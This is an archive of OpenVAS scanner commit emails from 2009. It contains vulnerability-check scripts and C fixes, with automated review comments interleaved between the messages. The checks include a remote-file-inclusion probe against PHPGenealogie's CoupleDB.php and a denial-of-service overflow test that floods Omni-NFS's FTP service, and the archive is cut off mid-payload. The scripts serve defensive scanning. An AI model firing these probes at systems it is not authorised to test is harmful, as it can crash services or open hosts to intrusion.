@@ -0,0 +1,73 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_phpgenealogie_detect.nasl 5168 2009-10-07 16:25:36Z oct $ +# +# PHPGenealogie Version Detection +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801007); + script_version("$Revision: 1.0 $"); + script_name("PHPGenealogie Version Detection"); + desc = " + Overview: This script detects the installed version of PHPGenealogie and + sets the result in KB. 
+ + Risk factor: Informational"; + + script_description(desc); + script_summary("Set the version of PHPGenealogie in KB"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Service detection"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); + +phpgenPort = get_http_port(default:80); +if(!phpgenPort){ + phpgenPort = 80; +} + +if(!get_port_state(phpgenPort)){ + exit(0); +} + +foreach path (make_list("/geneald", "/genealogie_sql", "/genealogie", cgi_dirs())) +{ + sndReq = http_get(item:string(path, "/Index2.php"), port:phpgenPort); + rcvRes = http_send_recv(port:phpgenPort, data:sndReq); + if("genealogie" >< rcvRes) + { + phpgenVer = eregmatch(pattern:"> ([0-9.]+)",string:rcvRes); + if(phpgenVer[1] != NULL) + { + set_kb_item(name:"www/" + phpgenPort + "/PHPGenealogie", + value:phpgenVer[1] + " under " + path); + } + } +} Added: trunk/openvas-plugins/scripts/gb_phpgenealogie_rfi_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_phpgenealogie_rfi_vuln.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_phpgenealogie_rfi_vuln.nasl 2009-10-08 06:22:29 UTC (rev 5436) 
@@ -0,0 +1,105 @@ +############################################################################## +# OpenVAS Vulnerability Test +# $Id: gb_phpgenealogie_rfi_vuln.nasl 5168 2009-10-07 09:56:24Z oct $ +# +# PHPGenealogie 'CoupleDB.php' Remote File Inclusion Vulnerability +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801008); + script_version("$Revision: 1.0$"); + script_cve_id("CVE-2009-3541"); + script_name("PHPGenealogie 'CoupleDB.php' Remote File Inclusion Vulnerability"); + desc = " + Overview: This host is running PHPGenealogie and is prone to Remote File + Inclusion vulnerability. + + Vulnerability Insight: + The flaw is due to error in 'DataDirectory' parameter in 'CoupleDB.php' which + is not properly verified before being used to include files. + + Impact: + Successful exploitation will let the attacker to execute arbitrary code on + the vulnerable Web server. + + Impact level: Application/System + + Affected Software/OS: + PHPGenealogie version 2.0 + + Fix: No solution or patch is available as on 07th October, 2009. Information + regarding this issue will be updated once the solution details are available. 
+ For updates refer, http://sourceforge.net/projects/phpgenealogie/files/ + + References: + http://www.milw0rm.com/exploits/9155 + http://xforce.iss.net/xforce/xfdb/51728 + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 6.7 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version and attack of PHPGenealogie"); + script_category(ACT_MIXED_ATTACK); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Web application abuses"); + script_dependencies("gb_phpgenealogie_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +phpgenPort = get_http_port(default:80); +if(!phpgenPort){ + exit(0); +} + +phpgenVer = get_kb_item("www/" + phpgenPort + "/PHPGenealogie"); +phpgenVer = eregmatch(pattern:"^(.+) under (/.*)$", string:phpgenVer); + +if((phpgenVer[2] != NULL) && (!safe_checks())) +{ + sndReq = http_get(item:string(phpgenVer[2], "/CoupleDB.php?Parametre=0&" + + "DataDirectory=xyz/OpenVAS-RemoteFileInclusion.txt"), + port:phpgenPort); + rcvRes = http_send_recv(port:phpgenPort, data:sndReq); + if("xyz/OpenVAS-RemoteFileInclusion.txt" >< rcvRes) + { + security_hole(phpgenPort); + exit(0); + } +} +else +{ + if(phpgenVer[1] != NULL) + { + if(version_is_equal(version:phpgenVer[1], test_version:"2.0")){ + security_hole(phpgenPort); + } + } +} Property changes on: trunk/openvas-plugins/scripts/gb_phpgenealogie_rfi_vuln.nasl ___________________________________________________________________ Name: svn:executable + * From scm-commit at wald.intevation.org Thu Oct 8 09:48:40 2009 
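Review bot: in gb_linkspheric_detect.nasl (r5436), `spheric_ver[1] = ereg_replace(pattern:" ", replace:".", string:version[1]);` runs before anything checks that `version` matched, so when both the admin/index.php and the CHANGELOG patterns fail, the `if(!isnull(spheric_ver[1]))` guard is testing the output of ereg_replace on an empty input rather than whether a version was found. Test `version[1]` first and do the replacement inside that block. The two Beta sub-patterns also differ (`( Beta [0-9.])?` for the admin page, `( Beta [0-9])?` for CHANGELOG) and both accept a single character only; use one shared pattern with `[0-9.]+`.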
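Review bot: in gb_linkspheric_viewlisting_sql_inj_vuln.nasl (r5436), the version comparison sits in the `else` of `if(!isnull(spheric_ver[2]) && !safe_checks())`, so with safe checks disabled a probe whose response does not contain the marker ends the script without the detected version ever being consulted. If the version check is meant as the fallback, run it whenever the active test did not report, not only when the active test was skipped. Separately, the detect script can store `/` as the directory, in which case `string(spheric_ver[2], "/viewListing.php?...")` requests `//viewListing.php`; strip a trailing slash before concatenating.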
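Review bot: in gb_phpgenealogie_detect.nasl (r5436), the version pattern `"> ([0-9.]+)"` is not tied to any PHPGenealogie-specific text, so the first `> ` followed by a digit or dot anywhere in Index2.php becomes the stored version, and the only gate in front of it is `"genealogie" >< rcvRes`. Anchor the pattern on the label or markup that actually carries the version string, so that gb_phpgenealogie_rfi_vuln.nasl does not compare "2.0" against an unrelated number.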
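Review bot: in gb_phpgenealogie_rfi_vuln.nasl (r5436), the result of `get_kb_item("www/" + phpgenPort + "/PHPGenealogie")` goes straight into eregmatch() with no isnull() check, unlike the linkSpheric script in the same commit; add `if(isnull(phpgenVer)) exit(0);` so the script stops when detection found nothing. The positive test `"xyz/OpenVAS-RemoteFileInclusion.txt" >< rcvRes` only shows that the parameter value appears somewhere in the response, which is also true of any page that echoes the request URL or query string; match on output that the failed include produces rather than on the bare value.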
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 09:48:40 +0200 (CEST) Subject: [Openvas-commits] r5437 - in trunk/openvas-libraries: . nasl Message-ID: <20091008074840.94CFF85C72FF@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-08 09:48:39 +0200 (Thu, 08 Oct 2009) New Revision: 5437 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/nasl/CMakeLists.txt Log: * nasl/CMakeList.txt: Added defines for _FILE_OFFSET_BITS and LARGEFILE_SOURCE since they are needed by GPGME for key access. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-08 06:22:29 UTC (rev 5436) +++ trunk/openvas-libraries/ChangeLog 2009-10-08 07:48:39 UTC (rev 5437) @@ -1,3 +1,8 @@ +2009-10-08 Michael Wiegand + + * nasl/CMakeList.txt: Added defines for _FILE_OFFSET_BITS and + LARGEFILE_SOURCE since they are needed by GPGME for key access. + 2009-10-07 Matthew Mundell * misc/openvas_server.c (openvas_server_open): Create address with Modified: trunk/openvas-libraries/nasl/CMakeLists.txt =================================================================== --- trunk/openvas-libraries/nasl/CMakeLists.txt 2009-10-08 06:22:29 UTC (rev 5436) +++ trunk/openvas-libraries/nasl/CMakeLists.txt 2009-10-08 07:48:39 UTC (rev 5437) @@ -129,7 +129,8 @@ ## Library set (CMAKE_C_FLAGS_DEBUG "${CMAKE_C_FLAGS_DEBUG} -Wall") -set (CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Wall") +# The "-D_FILE_OFFSET_BITS=64 -DLARGEFILE_SOURCE=1" is necessary for GPGME! +set (CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Wall -D_FILE_OFFSET_BITS=64 -DLARGEFILE_SOURCE=1") ## Compile the parser - note that there are (better) CMake macros to achieve From scm-commit at wald.intevation.org Thu Oct 8 10:28:30 2009 
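Review bot: in the nasl/CMakeLists.txt hunk (r5437), the second define added to CMAKE_C_FLAGS is spelled `-DLARGEFILE_SOURCE=1`, but the glibc feature-test macro is `_LARGEFILE_SOURCE` with a leading underscore, so as written it defines a name the C library headers do not look at. Use `-D_LARGEFILE_SOURCE=1` and correct the comment above the `set`, or drop the define if `-D_FILE_OFFSET_BITS=64` alone is what GPGME needs. The ChangeLog entry and the log message also name the file `nasl/CMakeList.txt`; the file is `CMakeLists.txt`.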
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 10:28:30 +0200 (CEST) Subject: [Openvas-commits] r5438 - in trunk/openvas-plugins: . scripts Message-ID: <20091008082830.3494685D9F46@pyrosoma.intevation.org> Author: mime Date: 2009-10-08 10:28:27 +0200 (Thu, 08 Oct 2009) New Revision: 5438 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/showmount.nasl Log: Added script_copyright to showmount.nasl Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-08 07:48:39 UTC (rev 5437) +++ trunk/openvas-plugins/ChangeLog 2009-10-08 08:28:27 UTC (rev 5438) @@ -1,3 +1,8 @@ +2009-10-08 Michael Meyer + + * scripts/showmount.nasl: + Added script_copyright(). + 2009-10-08 Chandrashekhar B * scripts/gb_phpgenealogie_detect.nasl, Modified: trunk/openvas-plugins/scripts/showmount.nasl =================================================================== --- trunk/openvas-plugins/scripts/showmount.nasl 2009-10-08 07:48:39 UTC (rev 5437) +++ trunk/openvas-plugins/scripts/showmount.nasl 2009-10-08 08:28:27 UTC (rev 5438) @@ -24,6 +24,7 @@ # License along with this program. If not, see # . ################################################################### + if(description) { script_id(102014); @@ -50,6 +51,7 @@ script_description(desc); script_summary("Checks for NFS shares"); script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 LSS"); script_family("Remote file access"); script_dependencie("secpod_rpc_portmap.nasl"); script_require_keys("rpc/portmap"); From scm-commit at wald.intevation.org Thu Oct 8 11:41:24 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 11:41:24 +0200 (CEST) Subject: [Openvas-commits] r5439 - in trunk/openvas-scanner: . openvassd Message-ID: <20091008094124.84F0F85D9F5D@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-08 11:41:23 +0200 (Thu, 08 Oct 2009) New Revision: 5439 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/openvassd/otp_1_0.c Log: * openvassd/otp_1_0.c (otp_1_0_server_send_certificates): Added todo for segfault on nonexistent public key. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-08 08:28:27 UTC (rev 5438) +++ trunk/openvas-scanner/ChangeLog 2009-10-08 09:41:23 UTC (rev 5439) @@ -1,3 +1,8 @@ +2009-10-08 Michael Wiegand + + * openvassd/otp_1_0.c (otp_1_0_server_send_certificates): Added todo + for segfault on nonexistent public key. + 2009-10-06 Tim Brown * openvassd/utils.c: Fixed memory leak, typos and resource leak. Also added Modified: trunk/openvas-scanner/openvassd/otp_1_0.c =================================================================== --- trunk/openvas-scanner/openvassd/otp_1_0.c 2009-10-08 08:28:27 UTC (rev 5438) +++ trunk/openvas-scanner/openvassd/otp_1_0.c 2009-10-08 09:41:23 UTC (rev 5439) @@ -93,6 +93,10 @@ // Replace newlines by semicolons gchar* pos = cert->public_key; + /** @todo This will segfault if the public key could not be retrieved. + * A solution would be to check if cert->public_key is NULL and try to + * recover if it is. + */ while(pos[0] != '\0') { if(pos[0] == '\n') pos[0] = ';'; From scm-commit at wald.intevation.org Thu Oct 8 12:26:03 2009 
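Review bot: in openvassd/otp_1_0.c (r5439), the added @todo records that the `while(pos[0] != '\0')` loop dereferences `cert->public_key` without a NULL check, but the crash itself stays in place in a function that runs on the server side of the protocol. The guard is small enough to land with this commit: test `cert->public_key` before `gchar* pos = cert->public_key;` and skip the certificate (or the newline replacement) when it is NULL, then drop the @todo.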
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 12:26:03 +0200 (CEST) Subject: [Openvas-commits] r5440 - in trunk/openvas-client: . openvas openvas/prefs_dialog Message-ID: <20091008102603.59FE6861EAA0@pyrosoma.intevation.org> Author: mattm Date: 2009-10-08 12:26:01 +0200 (Thu, 08 Oct 2009) New Revision: 5440 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/openvas-client.c trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/openvas-client.c [USE_OMP] (refresh_server): Remove context_save_recurse. * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (scopetree_refresh): Call context_save_recurse after prefs_context_update after refresh_server, so that plugin prefs are synced before the RC is saved. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-08 09:41:23 UTC (rev 5439) +++ trunk/openvas-client/ChangeLog 2009-10-08 10:26:01 UTC (rev 5440) @@ -1,3 +1,12 @@ +2009-10-08 Matthew Mundell + + * openvas/openvas-client.c [USE_OMP] (refresh_server): Remove + context_save_recurse. + + * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (scopetree_refresh): + Call context_save_recurse after prefs_context_update after refresh_server, + so that plugin prefs are synced before the RC is saved. + 2009-10-07 Matthew Mundell * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (create_omp_scope): Modified: trunk/openvas-client/openvas/openvas-client.c =================================================================== --- trunk/openvas-client/openvas/openvas-client.c 2009-10-08 09:41:23 UTC (rev 5439) +++ trunk/openvas-client/openvas/openvas-client.c 2009-10-08 10:26:01 UTC (rev 5440) 
@@ -460,9 +460,6 @@ plugin_cache_write (context, context->plugins_md5sum); } - /* Save the RC to disk, so that new scopes can copy it. */ - context_save_recurse (context); - return NULL; } #endif /* USE_OMP */ Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-08 09:41:23 UTC (rev 5439) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-08 10:26:01 UTC (rev 5440) @@ -1253,8 +1253,12 @@ /* Refresh the information about the manager. */ message = refresh_server (context); - // FIX why? (was setting _login here and saving prefs) + /* This is necessary, at least because it calls context_sync_plugin_prefs, + * which copies plugin prefs from context->plugins and context->scanners to + * context->plugin_prefs. */ prefs_context_update (context); + /* Save the RC to disk, so that new scopes can copy it. */ + context_save_recurse (context); if (message) { openvas_server_close (context->socket, context->session); From scm-commit at wald.intevation.org Thu Oct 8 14:21:17 2009 
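Review bot: in scopetree_refresh (prefs_scope_tree.c, r5440), `context_save_recurse (context);` now runs before the `if (message)` test, so the RC is written to disk even when refresh_server returned an error message; in refresh_server the removed call sat directly before `return NULL;`, a path on which there is no message. Move the save below the error handling or guard it with `if (message == NULL)`. It is also worth checking whether any other caller of refresh_server relied on the save that this commit removes.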
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 14:21:17 +0200 (CEST) Subject: [Openvas-commits] r5441 - in trunk/openvas-manager: . src Message-ID: <20091008122117.0239385C72EB@pyrosoma.intevation.org> Author: mattm Date: 2009-10-08 14:21:16 +0200 (Thu, 08 Oct 2009) New Revision: 5441 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/tasks_sql.h Log: * src/tasks_sql.h (set_task_parameter): Free rc on fail. Moving setting the task description and targets to precede filling the config, as insert_rc_into_config modifies its rc argument. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-08 10:26:01 UTC (rev 5440) +++ trunk/openvas-manager/ChangeLog 2009-10-08 12:21:16 UTC (rev 5441) @@ -1,3 +1,9 @@ +2009-10-08 Matthew Mundell + + * src/tasks_sql.h (set_task_parameter): Free rc on fail. Moving setting + the task description and targets to precede filling the config, as + insert_rc_into_config modifies its rc argument. + 2009-10-07 Matthew Mundell * src/tasks_sql.h (make_task_rcfile): Remove append of name. Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2009-10-08 10:26:01 UTC (rev 5440) +++ trunk/openvas-manager/src/tasks_sql.h 2009-10-08 12:21:16 UTC (rev 5441) @@ -2766,6 +2766,8 @@ int set_task_parameter (task_t task, const char* parameter, /*@only@*/ char* value) { + /** @todo Free value consistently. */ + tracef (" set_task_parameter %u %s\n", task_id (task), parameter ? parameter : "(null)"); @@ -2785,6 +2787,14 @@ sql ("BEGIN IMMEDIATE;"); + /* Update task description (rcfile). */ + + quoted_rc = sql_quote ((gchar*) rc); + sql ("UPDATE tasks SET description = '%s' WHERE ROWID = %llu;", + quoted_rc, + task); + g_free (quoted_rc); + /* Update task config. */ { 
@@ -2795,6 +2805,7 @@ config_name = task_config (task); if (config_name == NULL) { + g_free (rc); sql ("END"); return -1; } @@ -2803,6 +2814,7 @@ if (target == NULL) { free (config_name); + g_free (rc); sql ("END"); return -1; } @@ -2812,6 +2824,7 @@ { free (config_name); free (target); + g_free (rc); sql ("END"); return -1; } @@ -2823,6 +2836,7 @@ free (quoted_selector); free (config_name); free (target); + g_free (rc); sql ("END"); return -1; } @@ -2831,6 +2845,7 @@ free (quoted_selector); free (config_name); free (target); + g_free (rc); sql ("END"); return -1; } @@ -2849,39 +2864,35 @@ quoted_selector); free (quoted_selector); - /* Fill config from RC. */ + /* Replace targets. */ - quoted_config_name = sql_quote (config_name); - free (config_name); - if (insert_rc_into_config (config, quoted_config_name, (gchar*) rc)) + hosts = rc_preference ((gchar*) rc, "targets"); + if (hosts == NULL) { + free (config_name); + g_free (rc); sql ("END"); return -1; } + set_target_hosts (target, hosts); + free (hosts); - /* Replace targets. */ + /* Fill config from RC. */ - hosts = rc_preference ((gchar*) rc, "targets"); - if (hosts == NULL) + quoted_config_name = sql_quote (config_name); + free (config_name); + /* This modifies rc. */ + if (insert_rc_into_config (config, quoted_config_name, (gchar*) rc)) { + g_free (rc); sql ("END"); return -1; } - set_target_hosts (target, hosts); - free (hosts); + g_free (rc); } + + sql ("COMMIT"); } - - /* Update task description (rcfile). */ - - quoted_rc = sql_quote ((gchar*) rc); - g_free (rc); - sql ("UPDATE tasks SET description = '%s' WHERE ROWID = %llu;", - quoted_rc, - task); - g_free (quoted_rc); - - sql ("COMMIT"); } else if (strcasecmp ("NAME", parameter) == 0) { From scm-commit at wald.intevation.org Thu Oct 8 14:27:44 2009 
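Review bot: in set_task_parameter (src/tasks_sql.h, r5441), the `UPDATE tasks SET description = '%s' WHERE ROWID = %llu;` now runs right after `sql ("BEGIN IMMEDIATE;")`, ahead of every failure path, and those paths close the transaction with `sql ("END")`. BEGIN IMMEDIATE and ROWID point to SQLite, where END is a synonym for COMMIT, so a call that returns -1 now leaves the new description committed while the config and targets are unchanged. Use `sql ("ROLLBACK")` on the failure paths. In the relocated "Replace targets" block the `hosts == NULL` path frees `config_name` and `rc` but not `target`, which the earlier failure paths do free.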
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 14:27:44 +0200 (CEST) Subject: [Openvas-commits] r5442 - in trunk/openvas-client: . openvas/prefs_dialog Message-ID: <20091008122744.2CD55861EAA8@pyrosoma.intevation.org> Author: mattm Date: 2009-10-08 14:27:43 +0200 (Thu, 08 Oct 2009) New Revision: 5442 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_new_with_parent/scopetree_add_new_with_parent) [USE_OMP]: Note error in g_file_get_contents fail handling. Check omp_modify_task return. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-08 12:21:16 UTC (rev 5441) +++ trunk/openvas-client/ChangeLog 2009-10-08 12:27:43 UTC (rev 5442) @@ -1,5 +1,12 @@ 2009-10-08 Matthew Mundell + * openvas/prefs_dialog/prefs_scope_tree.c + (scopetree_new_with_parent/scopetree_add_new_with_parent) [USE_OMP]: + Note error in g_file_get_contents fail handling. Check omp_modify_task + return. + +2009-10-08 Matthew Mundell + * openvas/openvas-client.c [USE_OMP] (refresh_server): Remove context_save_recurse. Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-08 12:21:16 UTC (rev 5441) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-08 12:27:43 UTC (rev 5442) 
@@ -415,17 +415,26 @@ g_file_get_contents (rcfile, &rc, &rc_len, &error); if (error) { - // FIX note error + free (id); + show_error (_("%s: Failed to get scope RC file: %s"), + __FUNCTION__, + error->message); g_error_free (error); openvas_server_close (server->socket, server->session); server->socket = 0; + return NULL; + } + + if (omp_modify_task (&server->session, id, rc, NULL, NULL)) + { free (id); - show_error (_("%s: Failed to get scope RC file"), __FUNCTION__); + g_free (rc); + show_error (_("%s: Failed to set RC on task on manager"), + __FUNCTION__); + openvas_server_close (server->socket, server->session); + server->socket = 0; return NULL; } - - // FIX check error - omp_modify_task (&server->session, id, rc, NULL, NULL); g_free (rc); openvas_server_close (server->socket, server->session); From scm-commit at wald.intevation.org Thu Oct 8 20:03:38 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 20:03:38 +0200 (CEST) Subject: [Openvas-commits] r5443 - in trunk/openvas-plugins: . scripts Message-ID: <20091008180338.1A0C785D9F47@pyrosoma.intevation.org> Author: mime Date: 2009-10-08 20:03:34 +0200 (Thu, 08 Oct 2009) New Revision: 5443 Added: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl trunk/openvas-plugins/scripts/Xlpd_36610.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl trunk/openvas-plugins/scripts/secpod_smb_func.inc trunk/openvas-plugins/scripts/smb_explorer_version.nasl trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl trunk/openvas-plugins/scripts/spybot_detection.nasl Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/ChangeLog 2009-10-08 18:03:34 UTC (rev 5443) 
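Review bot: in prefs_scope_tree.c (r5442), the failure test after `g_file_get_contents (rcfile, &rc, &rc_len, &error);` is still `if (error)`; GLib reports failure through the gboolean return value, and `error` is only meaningful if it was NULL before the call. Test the return value instead. The sequence `openvas_server_close (server->socket, server->session); server->socket = 0;` now appears on both failure paths, and the close is repeated on the success path; a single cleanup label would keep the three in step and make it harder to miss a `free (id)` or `g_free (rc)` on a future path.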
@@ -1,5 +1,21 @@ 2009-10-08 Michael Meyer + * scripts/Xlpd_36610.nasl, + scripts/Omni_NFS_36608.nasl: + Added new plugins. + + * scripts/spybot_detection.nasl, + scripts/cisco_vpn_client_detect.nasl, + scripts/smb_explorer_version.nasl, + scripts/sonicwall_vpn_client_detect.nasl: + Modified so that they don't need smb_func.inc + anymore. + + * scripts/secpod_smb_func.inc: + Added function GetVersionFromFile(). + +2009-10-08 Michael Meyer + * scripts/showmount.nasl: Added script_copyright(). Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/cve_current.txt 2009-10-08 18:03:34 UTC (rev 5443) @@ -119,3 +119,5 @@ CVE-2009-3562 SecPod CVE-2009-3561 SecPod CVE-2009-3525 SecPod +36610 Greenbone svn R +36608 Greenbone svn R Added: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl =================================================================== --- trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl 2009-10-08 18:03:34 UTC (rev 5443) 
@@ -0,0 +1,123 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100297); + script_bugtraq_id(36608); + script_version ("1.0-$Revision$"); + + script_name("Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities"); + +desc = "Overview: +Omni-NFS is prone to multiple stack-based buffer-overflow +vulnerabilities because the application fails to properly bounds-check +user-supplied network data before copying it into an insufficiently +sized memory buffer. The issues affect both server and client. + +Exploiting these issues allows attackers to execute arbitrary machine +code in the context of users running the affected application. Failed +attempts will likely crash the application, resulting in denial-of- +service conditions. + +Omni-NFS 5.2 is vulnerable; other versions may also be affected. 
+ +References: +http://www.securityfocus.com/bid/36608 +http://www.xlink.com/nfs_products/NFS_Server/NFS_Server.htm + +Risk factor : Low"; + + script_description(desc); + script_summary("Determine if Omni-NFS is prone to a Stack Buffer Overflow"); + script_category(ACT_DENIAL); + script_family("Buffer overflow"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl"); + script_require_ports("Services/ftp", 21); + exit(0); +} + +include("misc_func.inc"); +include("ftp_func.inc"); + +if(safe_checks())exit(0); + +port = get_kb_item("Services/ftp"); +if(!port)port = 21; + +if(get_kb_item('ftp/'+port+'/broken'))exit(0); +if(!get_port_state(port))exit(0); + +banner = get_ftp_banner(port:port); + +if("XLINK" >!< banner)exit(0); + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +crapdata = crap(length:30000); + +req = raw_string(0x4e,0x40,0x96,0xb5,0x46,0x89,0xe3,0x4a,0x1c,0xb1,0x98,0x2c,0xb4,0xb3,0x7b,0x39, +0xf5,0xa9,0x7c,0x15,0xb7,0xba,0x8c,0xe1,0x4b,0x90,0x73,0x27,0x7b,0x70,0x75,0x10, +0xe0,0x72,0x4b,0x83,0xeb,0x7a,0x79,0x3c,0xb7,0x48,0x71,0x24,0x7d,0x2d,0xbe,0x40, +0xb0,0x97,0x46,0x0c,0x1c,0x96,0x80,0xd4,0x3b,0xe2,0x41,0x1d,0xba,0x81,0xfd,0x37, +0x04,0x15,0xbb,0x43,0xb6,0x49,0x8d,0x93,0x77,0x66,0x42,0x76,0x78,0x74,0x7f,0x2c, +0x0b,0xf5,0x99,0x47,0xb8,0x9b,0x98,0x29,0xe3,0x05,0x4e,0xb5,0xa9,0xb4,0x14,0x4a, +0xbf,0x86,0xd6,0xb3,0xb9,0x77,0x31,0xf9,0xa8,0xb2,0x7d,0x02,0xd5,0xb1,0x78,0x35, +0x73,0x67,0x7f,0x2a,0xe0,0x34,0x71,0x4f,0x7c,0x03,0xfc,0x91,0x74,0x19,0xeb,0x32, +0xf6,0xe2,0x3f,0x9f,0x7b,0x1a,0xc1,0xf8,0x92,0xbb,0xb3,0x7a,0x18,0xe1,0x42,0x87, +0xf9,0xb4,0x4b,0x79,0x04,0xba,0x75,0x38,0xe3,0x3c,0x98,0x67,0xb6,0xbf,0xa9,0x09, +0xf8,0x91,0xb8,0x4e,0x43,0xb9,0xb7,0x2d,0x72,0x12,0xfc,0x3f,0x9b,0x8d,0x49,0x76, +0x05,0x23,0xd4,0x2c,0x93,0x46,0xb2,0x0c,0x15,0x4a,0x90,0x37,0x1b,0xc0,0xd6,0x24, 
